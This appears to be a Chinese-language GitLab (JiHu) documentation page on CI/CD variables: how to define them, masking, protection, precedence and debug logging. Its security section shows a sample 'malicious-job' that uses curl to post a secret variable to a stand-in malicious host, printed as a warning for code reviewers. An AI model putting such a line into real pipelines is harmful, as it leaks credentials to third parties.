---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments
type: reference
---

# 极狐GitLab CI/CD 变量 **(FREE)**

CI/CD 变量是一种环境变量。 您可以将它们用于：

- 控制作业和[流水线](../pipelines/index.md)。
- 存储要重复使用的值。
- 避免在您的 `.gitlab-ci.yml` 文件中硬编码值。

您可以[为特定流水线手动覆盖变量值](../jobs/index.md#specifying-variables-when-running-manual-jobs)，或让它们[在手动流水线中预填入](../pipelines/index.md#prefill-variables-in-manual-pipelines)。

变量名称受限于 [runner 使用的 shell](https://docs.gitlab.cn/runner/shells/index.html) 来执行脚本。每个 shell 都有自己的一组保留变量名称。

为确保一致的行为，您应该始终将变量值放在单引号或双引号中。
变量由 [Psych YAML 解析器](https://docs.ruby-lang.org/en/master/Psych.html)进行内部解析，因此引用变量和未引用变量的解析方式可能不同。例如，`VAR1: 012345` 被解析为八进制值，因此值变为 `5349`，但 `VAR1: "012345"` 被解析为值为 `012345` 的字符串。

<!--
> For more information about advanced use of GitLab CI/CD:
>
> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i>&nbsp;Get to productivity faster with these [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/)
>   shared by GitLab engineers.
> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i>&nbsp;Learn how the Cloud Native Computing Foundation (CNCF) [eliminates the complexity](https://about.gitlab.com/customers/cncf/)
>   of managing projects across many cloud providers with GitLab CI/CD.
-->

<a id="predefined-cicd-variables"></a>

## 预定义 CI/CD 变量

极狐GitLab CI/CD 使一组[预定义的 CI/CD 变量](predefined_variables.md)可用于流水线配置和作业脚本。这些变量包含有关作业、流水线的信息，以及流水线被触发或运行时您可能需要的其他值。

您可以在 `.gitlab-ci.yml` 中使用预定义的 CI/CD 变量，而无需先声明它们。

例如：

```yaml
job1:
  stage: test
  script:
    - echo "The job's stage is '$CI_JOB_STAGE'"
```

此示例中的脚本输出 `The job's stage is 'test'`。

<a id="define-a-cicd-variable-in-the-gitlab-ciyml-file"></a>

### 在 `.gitlab-ci.yml` 文件中定义 CI/CD 变量

要在 [`.gitlab-ci.yml`](../yaml/index.md#variables) 文件中创建自定义变量，请使用 `variables` 关键字定义变量和值。

保存在 `.gitlab-ci.yml` 文件中的变量对所有有权访问存储库的用户可见，并且应该只存储非敏感的项目配置。例如，保存在 `DATABASE_URL` 变量中的数据库的 URL。包含 secret 或密钥等值的敏感变量应该[存储在项目设置中](#define-a-cicd-variable-in-the-ui)。

您可以在作业中或在 .gitlab-ci.yml 文件的顶层使用 `variables` 关键字。
如果变量在顶层，则它是全局可用的，所有作业都可以使用它。
如果它在作业中定义，则只有该作业可以使用它。

例如：

```yaml
variables:
  GLOBAL_VAR: "A global variable"

job1:
  variables:
    JOB_VAR: "A job variable"
  script:
    - echo "Variables are '$GLOBAL_VAR' and '$JOB_VAR'"

job2:
  script:
    - echo "Variables are '$GLOBAL_VAR' and '$JOB_VAR'"
```

在此示例中：

- `job1` 输出 `Variables are 'A global variable' and 'A job variable'`
- `job2` 输出 `Variables are 'A global variable' and ''`

使用 [`value` 和 `description`](../yaml/index.md#variablesdescription) 关键字来定义[预填入的变量](./pipelines/index.md#prefill-variables-in-manual-pipelines)，用于[手动触发的流水线](../pipelines/index.md#run-a-pipeline-manually)。

### 在单个作业中跳过全局变量

如果您不想在作业中使用全局定义的变量，请将 `variables` 设置为 `{}`：

```yaml
variables:
  GLOBAL_VAR: "A global variable"

job1:
  variables: {}
  script:
    - echo This job does not need any variables
```

使用 [`value` 和 `description`](../yaml/index.md#variablesdescription) 关键字来定义用于[手动触发的流水线](../pipelines/index.md#run-a-pipeline-manually)的[预填充的变量](../pipelines/index.md#prefill-variables-in-manual-pipelines)。

<a id="define-a-cicd-variable-in-the-ui"></a>

## 在 UI 中定义 CI/CD 变量

您可以在 UI 中定义 CI/CD 变量：

- 对于一个项目：
  - [在项目设置中定义](#for-a-project)。
  - [使用 API 定义](../../api/project_level_variables.md)。
- 对于群组中的所有项目，[在群组设置中定义](#for-a-group)。
- 对于极狐GitLab 实例中的所有项目，[在实例设置中定义](#for-an-instance)。

默认情况下，派生项目中的流水线无法访问父项目中的 CI/CD 变量。
如果您[在父项目中为来自派生项目的合并请求运行合并请求流水线](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project)，所有变量都可用于流水线。

极狐GitLab UI 中设置的变量**不**传递给[服务容器](../docker/using_docker_images.md)。
要设置它们，请将它们分配给 UI 中的变量，然后在您的 `.gitlab-ci.yml` 中重新分配它们：

```yaml
variables:
  SA_PASSWORD: $SA_PASSWORD
```

<a id="for-a-project"></a>

### 对于一个项目

> - 引入于 15.7 版本，项目最多可以定义 200 个 CI/CD 变量。
> - 更新于 15.9 版本，项目最多可以定义 8000 个 CI/CD 变量。

您可以将 CI/CD 变量添加到项目的设置中。

先决条件：

- 您必须是具有维护者角色的项目成员。

要在项目设置中添加或更新变量：

1. 转到您项目的 **设置 > CI/CD** 并展开 **变量** 部分。
1. 选择 **添加变量** 并填写详细信息：

    - **键**：必须是一行，不能有空格，只能使用字母、数字或`_`。
    - **值**：没有限制。
    - **类型**：`Variable`（默认）或 [`File`](#use-file-type-cicd-variables)。
    - **环境范围**：可选。`All`，或特定环境<!--[环境](#limit-the-environment-scope-of-a-cicd-variable)-->。
    - **保护变量**：可选。如果选中，该变量仅在受保护分支或标签上运行的流水线中可用。
    - **隐藏变量**：可选。如果选中，变量的 **值** 将在作业日志中被隐藏。如果值不满足[隐藏要求](#mask-a-cicd-variable)，则变量保存失败。

创建变量后，您可以在 [`.gitlab-ci.yml` 配置](../yaml/index.md)或[作业脚本](#use-cicd-variables-in-job-scripts)中使用。

<a id="for-a-group"></a>

### 对于群组

> - 对环境范围的支持引入于专业版 13.11 版本。
> - 引入于 15.7 版本，群组最多可以定义 200 个 CI/CD 变量。
> - 更新于 15.9 版本，群组最多可以定义 30000 个 CI/CD 变量。

您可以使 CI/CD 变量可用于群组中的所有项目。

先决条件：

- 您必须是具有所有者角色的群组成员。

添加群组变量：

1. 在群组中，前往 **设置 > CI/CD**。
1. 选择 **添加变量** 并填写详细信息：

    - **键**：必须是一行，不能有空格，只能使用字母、数字或`_`。
    - **值**：没有限制。
    - **类型**：`Variable`（默认）或 [`File`](#use-file-type-cicd-variables)。
    - **环境范围**：可选。`All`，或特定环境<!--[环境](#limit-the-environment-scope-of-a-cicd-variable)-->。 **(PREMIUM)**
    - **保护变量**：可选。如果选中，该变量仅在受保护分支或标签上运行的流水线中可用。
    - **隐藏变量**：可选。如果选中，变量的 **值** 将在作业日志中被隐藏。如果值不满足[隐藏要求](#mask-a-cicd-variable)，则变量保存失败。

项目中可用的群组变量列在项目的 **设置 > CI/CD > 变量** 部分。来自[子组](../../user/group/subgroups/index.md)的变量被递归继承。

<a id="for-an-instance"></a>

### 对于实例 **(FREE SELF)**

> - 引入于 13.0 版本。
> - 功能标志移除于 13.11 版本。

您可以使 CI/CD 变量可用于极狐GitLab 实例中的所有项目和群组。

先决条件：

- 您必须具有实例的管理员访问权限。

添加实例变量：

1. 在顶部栏上，选择 **主菜单 > 管理员**。
1. 在左侧边栏上，选择 **设置 > CI/CD** 并展开 **变量** 部分。
1. 选择 **添加变量** 并填写详细信息：


    - **键**：必须是一行，不能有空格，只能使用字母、数字或`_`。
    - **值**：在 13.3 及更高版本中，允许 10,000 个字符。这也受所选 runner 操作系统的限制。在 13.0 到 13.2 中，允许 700 个字符。
    - **类型**：`Variable`（默认）或 [`File`](#use-file-type-cicd-variables)。
    - **保护变量**：可选。如果选中，该变量仅在受保护分支或标签上运行的流水线中可用。
    - **隐藏变量**：可选。如果选中，变量的 **值** 不会显示在作业日志中。如果值不满足[隐藏要求](#mask-a-cicd-variable)，则不保存该变量。 

项目中可用的实例变量列在项目的 **设置 > CI/CD > 变量** 部分。

<a id="cicd-variable-security"></a>

## CI/CD 变量安全

推送到您的 `.gitlab-ci.yml` 文件的恶意代码可能会危及您的变量并将它们发送到第三方服务器，而不管隐藏设置如何。如果流水线在[受保护分支](../../user/project/protected_branches.md)或[受保护标签](../../user/project/protected_tags.md)上运行，恶意代码可能会损害受保护的变量。

在您执行以下操作之前，查看所有对 `.gitlab-ci.yml` 文件引入更改的合并请求：

- 在父项目中，为从派生项目提交的合并请求运行流水线<!--[Run a pipeline in the parent project for a merge request submitted from a forked project](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project).-->
- 合并更改

在添加文件或针对它们运行流水线之前，请查看导入项目的 `.gitlab-ci.yml` 文件。

以下示例显示了 `.gitlab-ci.yml` 文件中的恶意代码：

```yaml
accidental-leak-job:
  script:                                         # Password exposed accidentally
    - echo "This script logs into the DB with $USER $PASSWORD"
    - db-login $USER $PASSWORD

malicious-job:
  script:                                         # Secret exposed maliciously
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"
```


为了帮助降低通过 `accidental-leak-job` 等脚本意外泄露机密的风险，所有包含敏感信息的变量都应该[在作业日志中隐藏](#mask-a-cicd-variable)。
您还可以[将变量限制为仅适用于受保护的分支和标签](#protect-a-cicd-variable)。

或者，使用极狐GitLab [与 HashiCorp Vault 集成](../secrets/index.md) 来存储和检索 secrets。

像 `malicious-job` 这样的恶意脚本必须在审核过程中被捕获。
当审核者发现这样的代码时，他们永远不应该触发流水线，因为恶意代码会破坏隐藏的和受保护的变量。

变量值使用 `aes-256-cbc` 加密并存储在数据库中。只能使用有效的 secrets 文件读取和解密此数据。

<a id="mask-a-cicd-variable"></a>

### 隐藏 CI/CD 变量

<!--
> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784) in GitLab 11.10
-->

WARNING:
隐藏 CI/CD 变量并不能保证防止恶意用户访问变量值。隐藏功能是“尽力而为”的，可以在意外泄露变量时提供帮助。为了使变量更安全，请考虑使用[外部 secrets](../secrets/index.md) 和[文件类型变量](#use-file-type-cicd-variables) 来防止例如 `env`/ `printenv` 的命令打印 secret 变量。

您可以隐藏项目、群组或实例 CI/CD 变量，以便该变量的值不会显示在作业日志中。

先决条件：

- 您必须具有[在 UI 中定义 CI/CD 变量](#define-a-cicd-variable-in-the-ui)所需的相同角色或访问级别。

隐藏变量：

1. 在项目、群组或管理中心，转到 **设置 > CI/CD**。
1. 展开 **变量** 部分。
1. 在要保护的变量旁边，选择 **编辑**。
1. 选中 **隐藏变量** 复选框。
1. 选择 **更新变量**。

用于隐藏变量的方法限制了可以包含在隐藏变量中的内容。
变量的值必须：

- 是单行。
- 8 个字符或更长，仅包含：
  - Base64 字母表 (RFC4648) 中的字符。
  - `@` 和 `:` 字符。
  - `.` 字符。
  - `~` 字符。
- 与现有预定义或自定义 CI/CD 变量的名称不匹配。

不同版本的[极狐GitLab Runner](../runners/index.md) 有不同的隐藏限制：

| 开始版本 | 结束版本 | 限制 |
| ------------ | ---------- | ------ |
| v11.9.0      | v14.1.0    | 大型 secrets（大于 4 KiB）的隐藏可能会被泄露。没有敏感的 URL 参数隐藏。 |
| v14.2.0      | v15.3.0    | 大型 secrets（大于 4 KiB）的 tails 可能会被泄露。没有敏感的 URL 参数隐藏。 |
| v15.7.0      |            | 启用 `CI_DEBUG_SERVICES` 时可能会泄露 secrets。有关详细信息，请阅读[服务容器日志记录](../services/index.md#capturing-service-container-logs)。 |

<a id="protect-a-cicd-variable"></a>

### 保护 CI/CD 变量

您可以将项目、群组或实例 CI/CD 变量配置为仅可用于[受保护分支](../../user/project/protected_branches.md)或[受保护标签](../../user/project/protected_tags.md)。

[合并结果流水线](../pipelines/merged_results_pipelines.md)在临时合并提交上运行，而不是分支或标签，无法访问这些变量。
[合并请求流水线](../pipelines/merge_request_pipelines.md)不使用临时合并提交，如果分支是受保护的分支，则可以访问这些变量。

先决条件：

- 您必须具有[在 UI 中定义 CI/CD 变量](#define-a-cicd-variable-in-the-ui)所需的相同角色或访问级别。

要将变量标记为受保护：

1. 进入项目、群组或实例管理中心的 **设置 > CI/CD**。
1. 展开 **变量** 部分。
1. 在要保护的变量旁边，选择 **编辑**。
1. 选中 **保护变量** 复选框。
1. 选择 **更新变量**。

该变量可用于所有后续流水线。

<a id="use-file-type-cicd-variables"></a>

### 使用文件类型 CI/CD 变量

所有预定义的 CI/CD 变量和 `.gitlab-ci.yml` 文件中定义的变量都是 `Variable` 类型。项目、群组和实例 CI/CD 变量可以是 `Variable` 或 `File` 类型。

`Variable` 类型变量：

- 由键值对组成。
- 在作业中作为环境变量提供，具有：
   - CI/CD 变量键作为环境变量名称。
   - CI/CD 变量值作为环境变量值。

对于需要文件作为输入的工具，使用 `File` 类型的 CI/CD 变量。

`File` 类型变量：

- 由键、值和文件组成。
- 在作业中作为环境变量提供，具有：
   - CI/CD 变量键作为环境变量名称。
   - 保存到临时文件的 CI/CD 变量值。
   - 作为环境变量值的临时文件的路径。

一些工具，如 [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) 和 [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable) 使用 `File` 类型变量进行配置。

例如，如果您有以下变量：

- 类型为 `Variable`的变量：`KUBE_URL`，值为 `https://example.com`。
- 类型为 `File` 的变量：`KUBE_CA_PEM` 以证书作为值。

在作业脚本中使用变量，如下所示：

```shell
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM"
```

WARNING:
将文件变量的值分配给另一个变量时要小心。另一个变量将文件的内容作为其值，**不是**文件的路径。
<!--See [issue 29407](https://gitlab.com/gitlab-org/gitlab/-/issues/29407) for more details.-->

#### 使用 `.gitlab-ci.yml` 变量作为文件类型变量

您不能将[在 `.gitlab-ci.yml` 文件中定义](#define-a-cicd-variable-in-the-gitlab-ciyml-file)的 CI/CD 变量设置为文件类型变量。如果您有一个需要输入文件路径的工具，但您想使用在 `.gitlab-ci.yml` 中定义的变量：

- 运行将变量值保存在文件中的命令。
- 将该文件与您的工具一起使用。

例如：

```yaml
variables:
  SITE_URL: "https://example.gitlab.com"

job:
  script:
    - echo "$SITE_URL" > "site-url.txt"
    - mytool --url-file="site-url.txt"
```

<a id="use-cicd-variables-in-job-scripts"></a>

## 在作业脚本中使用 CI/CD 变量

所有 CI/CD 变量都设置为作业环境中的环境变量。
您可以在作业脚本中使用每个环境 shell 的标准格式的变量。

要访问环境变量，请使用 runner executor's shell<!--[runner executor's shell](https://docs.gitlab.com/runner/executors/)--> 的语法。

### 使用 Bash、`sh` 和类似的变量

要访问 Bash、`sh` 和类似 shell 中的环境变量，请在 CI/CD 变量前加上 (`$`)：

```yaml
job_name:
  script:
    - echo "$CI_JOB_ID"
```

### 在 PowerShell 中使用变量

要访问 Windows PowerShell 环境中的变量，包括系统设置的环境变量，请在变量名前加上 (`$env:`) 或 (`$`)：

```yaml
job_name:
  script:
    - echo $env:CI_JOB_ID
    - echo $CI_JOB_ID
    - echo $env:PATH
```

在某些情况下，环境变量必须用引号括起来才能正确扩展：

```yaml
job_name:
  script:
    - D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test
```

### 在 Windows Batch 中使用变量

要在 Windows Batch 中访问 CI/CD 变量，请用 `%` 将变量括起来：

```yaml
job_name:
  script:
    - echo %CI_JOB_ID%
```

您还可以用 `!` 将变量括起来以表示[延迟扩展](https://ss64.com/nt/delayedexpansion.html)。
包含空格或换行符的变量可能需要延迟扩展。

```yaml
job_name:
  script:
    - echo !ERROR_MESSAGE!
```

### 在服务容器中使用变量

[服务容器](../docker/using_docker_images.md)可以使用 CI/CD 变量，但默认只能访问[保存在`.gitlab-ci.yml`文件中的变量](#define-a-cicd-variable-in-the-gitlab-ciyml-file)。

默认情况下，[在极狐GitLab UI 中设置的变量](#define-a-cicd-variable-in-the-ui)不可用于服务容器。要使 UI 定义的变量在服务容器中可用，请在 `.gitlab-ci.yml` 中重新分配它：

```yaml
variables:
  SA_PASSWORD_YAML_FILE: $SA_PASSWORD_UI
```

### 将环境变量传递给另一个作业

<!--
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22638) in GitLab 13.0.
> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/217834) in GitLab 13.1.
-->

您可以在稍后阶段将环境变量从一个作业传递到另一个作业。
这些变量不能用作 CI/CD 变量来配置流水线，但可以在作业脚本中使用。

将作业创建的环境变量传递给其他作业：

1. 在作业脚本中，将变量保存为 `.env` 文件。
   - 文件的格式必须是每行一个变量定义。
   - 每行的格式必须为：`VARIABLE_NAME=ANY VALUE HERE`。
   - 值可以用引号引起来，但不能包含换行符。
1. 将 `.env` 文件保存为 [`artifacts:reports:dotenv`](../yaml/artifacts_reports.md#artifactsreportsdotenv) 产物。
1. 然后，后期阶段的作业可以 [在脚本中使用变量](#use-cicd-variables-in-job-scripts)。

例如：

```yaml
build-job:
  stage: build
  script:
    - echo "BUILD_VARIABLE=value_from_build_job" >> build.env
  artifacts:
    reports:
      dotenv: build.env

test-job:
  stage: test
  script:
    - echo "$BUILD_VARIABLE"  # Output is: 'value_from_build_job'
```

`dotenv` 报告中的变量[优先](#cicd-variable-precedence)于某些类型的新变量定义，例如作业定义的变量。

您还可以[将 `dotenv` 变量传递给下游流水线](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job)。

#### 控制哪些作业接收 `dotenv` 变量

您可以使用 [`dependencies`](../yaml/index.md#dependencies) 或 [`needs`](../yaml/index.md#needs) 关键字来控制哪些作业接收 `dotenv` 产物。

设置没有来自 dotenv 产物的环境变量：

- 传递一个空的 `dependencies` 或 `needs` 数组。
- 将 [`needs:artifacts`](../yaml/index.md#needsartifacts) 作为 `false` 传递。
- 将 `needs` 设置为仅列出没有 `dotenv` 产物的作业。

例如：

```yaml
build-job1:
  stage: build
  script:
    - echo "BUILD_VERSION=v1.0.0" >> build.env
  artifacts:
    reports:
      dotenv: build.env

build-job2:
  stage: build
  needs: []
  script:
    - echo "This job has no dotenv artifacts"

test-job1:
  stage: test
  script:
    - echo "$BUILD_VERSION"  # Output is: 'v1.0.0'
  dependencies:
    - build

test-job2:
  stage: test
  script:
    - echo "$BUILD_VERSION"  # Output is ''
  dependencies: []

test-job3:
  stage: test
  script:
    - echo "$BUILD_VERSION"  # Output is: 'v1.0.0'
  needs:
    - build-job1

test-job4:
  stage: test
  script:
    - echo "$BUILD_VERSION"  # Output is: 'v1.0.0'
  needs:
    job: build-job1
    artifacts: true

test-job5:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is ''
  needs:
    job: build-job1
    artifacts: false

test-job6:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is ''
  needs:
    - build-job2
```

### 在一个变量中存储多个值

无法创建作为值数组的 CI/CD 变量，但您可以使用 shell 脚本技术实现类似的行为。

例如，您可以在一个变量中存储由空格分隔的多个变量，然后使用脚本循环遍历这些值：

```yaml
job1:
  variables:
    FOLDERS: src test docs
  script:
    - |
      for FOLDER in $FOLDERS
        do
          echo "The path is root/${FOLDER}"
        done
```

<a id="use-variables-in-other-variables"></a>

### 在其他变量中使用变量

您可以在其他变量中使用变量：

```yaml
job:
  variables:
    FLAGS: '-al'
    LS_CMD: 'ls "$FLAGS"'
  script:
    - 'eval "$LS_CMD"'  # Executes 'ls -al'
```

### 在变量中使用 `$` 字符

如果您不想将 `$` 字符解释为变量的开头，请改用 `$$`：

```yaml
job:
  variables:
    FLAGS: '-al'
    LS_CMD: 'ls "$FLAGS" $$TMP_DIR'
  script:
    - 'eval "$LS_CMD"'  # Executes 'ls -al $TMP_DIR'
```

<a id="prevent-cicd-variable-expansion"></a>

### 阻止 CI/CD 变量展开

> 引入于 15.7 版本。

扩展变量将带有 `$` 字符的值视为对另一个变量的引用。CI/CD 变量默认展开。

要将带有 `$` 字符的变量视为原始字符串，请禁用变量的变量展开：

1. 在项目或群组中，转到 **设置 > CI/CD**。
1. 展开 **变量** 部分。
1. 在您不想展开的变量旁边，选择 **编辑**。
1. 清除 **展开变量** 复选框。
1. 选择 **更新变量**。

## CI/CD 变量优先级

您可以在不同的地方使用具有相同名称的 CI/CD 变量，但这些值可以相互覆盖。变量的类型及其定义位置决定了哪些变量优先。

变量的优先顺序是（从高到低）：

<!--
1. 触发器变量、计划流水线变量和手动流水线运行变量[Trigger variables](../triggers/index.md#making-use-of-trigger-variables),
   [scheduled pipeline variables](../pipelines/schedules.md#using-variables),
   and [manual pipeline run variables](#override-a-variable-when-running-a-pipeline-manually).
1. Project [variables](#custom-cicd-variables).
1. Group [variables](#add-a-cicd-variable-to-a-group).
1. Instance [variables](#add-a-cicd-variable-to-an-instance).
1. [Inherited variables](#pass-an-environment-variable-to-another-job).
1. Variables defined in jobs in the `.gitlab-ci.yml` file.
1. Variables defined outside of jobs (globally) in the `.gitlab-ci.yml` file.
1. [Deployment variables](#deployment-variables).
1. [Predefined variables](predefined_variables.md).
-->

1. 以下变量都具有相同（最高）的优先级：
   - 触发器变量
   - 计划流水线变量
   - 手动流水线运行变量
   - 使用 API 创建流水线时添加的变量
2. 项目变量。
3. 群组变量，如果群组及其子组中存在相同的变量名称，则作业使用最近子组中的值。 例如，如果您有 `Group > Subgroup 1 > Subgroup 2 > Project`，则在 `Subgroup 2` 中定义的变量优先。
4. 实例变量。
5. 继承的变量。
6. `.gitlab-ci.yml` 文件中的作业中定义的变量。
7. `.gitlab-ci.yml` 文件中在作业（全局）之外定义的变量。
8. 部署变量。
9. 预定义变量。

例如：

```yaml
variables:
  API_TOKEN: "default"

job1:
  variables:
    API_TOKEN: "secure"
  script:
    - echo "The variable is '$API_TOKEN'"
```

在此示例中，`job1` 输出 `The variable is 'secure'`，因为在作业中定义的变量比全局定义的变量具有更高的优先级。

<a id="override-a-defined-cicd-variable"></a>

### 覆盖定义的 CI/CD 变量

您可以在以下情况下覆盖变量的值：

- 在 UI 中[手动运行流水线](../pipelines/index.md#run-a-pipeline-manually)。
- 使用 [`pipelines` API 端点](../../api/pipelines.md#create-a-new-pipeline)创建流水线。
- 使用[推送选项](../../user/project/push_options.md#push-options-for-gitlab-cicd)。
- 使用 [`triggers` API 端点](../triggers/index.md#pass-cicd-variables-in-the-api-call)触发流水线。
- [通过使用 `variable` 关键字](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline)或[通过使用 `dotenv` 变量](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job)传递到下游流水线。

您应该避免覆盖[预定义变量](predefined_variables.md)，因为它会导致流水线出现意外结果。

### 手动运行流水线时覆盖变量

当您[手动运行流水线](../pipelines/index.md#run-a-pipeline-manually)时，您可以覆盖 CI/CD 变量的值。

1. 转到您项目的 **CI/CD > 流水线** 并选择 **运行流水线**。
1. 选择要为其运行流水线的分支。
1. 在 UI 中输入变量及其值。

### 限制谁可以覆盖变量

> 引入于 13.8 版本。

您只能向维护者授予覆盖变量的权限。当其他用户尝试运行带有覆盖变量的流水线时，他们会收到 `Insufficient permissions to set pipeline variables` 错误消息。

如果您[将 CI/CD 配置存储在不同的仓库中](../../ci/pipelines/settings.md#指定自定义-cicd-配置文件)，请使用此设置来控制流水线运行所在的环境。

您可以使用 API<!--[the projects API](../../api/projects.md#edit-project)--> 启用 `restrict_user_defined_variables` 设置，来启用此功能。该设置默认为 `disabled`。

<!--
## Related topics

- You can configure [Auto DevOps](../../topics/autodevops/index.md) to pass CI/CD variables
  to a running application. To make a CI/CD variable available as an environment variable in the running application's container,
  [prefix the variable key](../../topics/autodevops/cicd_variables.md#configure-application-secret-variables)
  with `K8S_SECRET_`.

- The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck)
  video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo)
  working example project. It explains how multiple levels of group CI/CD variables
  can be combined with environment-scoped project variables for complex configuration
  of application builds or deployments.

  The example can be copied to your own group or instance for testing. More details
  on what other GitLab CI patterns are demonstrated are available at the project page.
-->

## 故障排除

<a id="list-all-variables"></a>

### 列出所有环境变量

您可以使用 Bash 中的 `export` 命令或 PowerShell 中的 `dir env:` 列出脚本可用的所有环境变量。这暴露了**所有**可用变量的值，可能是一个[安全风险](#cicd-variable-security)。[隐藏变量](#mask-a-cicd-variable)显示为 `[masked]`。

例如：

```yaml
job_name:
  script:
    - export
    # - 'dir env:'  # Use this for PowerShell
```

作业日志输出示例：

```shell
export CI_JOB_ID="50"
export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a"
export CI_COMMIT_SHORT_SHA="1ecfd275"
export CI_COMMIT_REF_NAME="main"
export CI_REPOSITORY_URL="https://gitlab-ci-token:[masked]@example.com/gitlab-org/gitlab-foss.git"
export CI_COMMIT_TAG="1.0.0"
export CI_JOB_NAME="spec:other"
export CI_JOB_STAGE="test"
export CI_JOB_MANUAL="true"
export CI_JOB_TRIGGERED="true"
export CI_JOB_TOKEN="[masked]"
export CI_PIPELINE_ID="1000"
export CI_PIPELINE_IID="10"
export CI_PAGES_DOMAIN="gitlab.io"
export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab-foss"
export CI_PROJECT_ID="34"
export CI_PROJECT_DIR="/builds/gitlab-org/gitlab-foss"
export CI_PROJECT_NAME="gitlab-foss"
export CI_PROJECT_TITLE="GitLab FOSS"
...
```

<a id="enable-debug-logging"></a>

## 启用 Debug 日志

<!--
> Introduced in GitLab Runner 1.7.
-->

WARNING:
Debug 日志记录可能是一个严重的安全风险。输出包含作业可用的所有变量和其他 secret 的内容。输出上传到 GitLab 服务器并在作业日志中可见。

您可以使用 Debug 日志来帮助解决流水线配置或作业脚本的问题。Debug 日志公开了通常被 runner 隐藏的作业执行细节，并使作业日志更加详细。它还公开了作业可用的所有变量和 secret。

在启用 Debug 日志记录之前，请确保只有团队成员可以查看作业日志。在再次公开日志之前，您还应该[删除作业日志](../jobs/index.md#view-jobs-in-a-pipeline)和 Debug 输出。

要启用 Debug 日志记录（跟踪），请将 `CI_DEBUG_TRACE` 变量设置为 `true`：

```yaml
job_name:
  variables:
    CI_DEBUG_TRACE: "true"
```

示例输出（截取）：

```plaintext
...
export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE"
if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then
  echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\''
  $'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace"
  $'\''git'\'' "config" "fetch.recurseSubmodules" "false"
  $'\''rm'\'' "-f" ".git/index.lock"
  $'\''git'\'' "clean" "-ffdx"
  $'\''git'\'' "reset" "--hard"
  $'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git"
  $'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds"
++ CI_BUILDS_DIR=/builds
++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ export CI_CONCURRENT_ID=87
++ CI_CONCURRENT_ID=87
++ export CI_CONCURRENT_PROJECT_ID=0
++ CI_CONCURRENT_PROJECT_ID=0
++ export CI_SERVER=yes
++ CI_SERVER=yes
++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp
++ echo -n '-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----'
++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ export CI_PIPELINE_ID=52666
++ CI_PIPELINE_ID=52666
++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ export CI_JOB_ID=7046507
++ CI_JOB_ID=7046507
++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ export CI_JOB_TOKEN=[MASKED]
++ CI_JOB_TOKEN=[MASKED]
++ export CI_REGISTRY_USER=gitlab-ci-token
++ CI_REGISTRY_USER=gitlab-ci-token
++ export CI_REGISTRY_PASSWORD=[MASKED]
++ CI_REGISTRY_PASSWORD=[MASKED]
++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ export CI_JOB_NAME=debug_trace
++ CI_JOB_NAME=debug_trace
++ export CI_JOB_STAGE=test
++ CI_JOB_STAGE=test
++ export CI_NODE_TOTAL=1
++ CI_NODE_TOTAL=1
++ export CI=true
++ CI=true
++ export GITLAB_CI=true
++ GITLAB_CI=true
++ export CI_SERVER_URL=https://gitlab.com:3000
++ CI_SERVER_URL=https://gitlab.com:3000
++ export CI_SERVER_HOST=gitlab.com
++ CI_SERVER_HOST=gitlab.com
++ export CI_SERVER_PORT=3000
++ CI_SERVER_PORT=3000
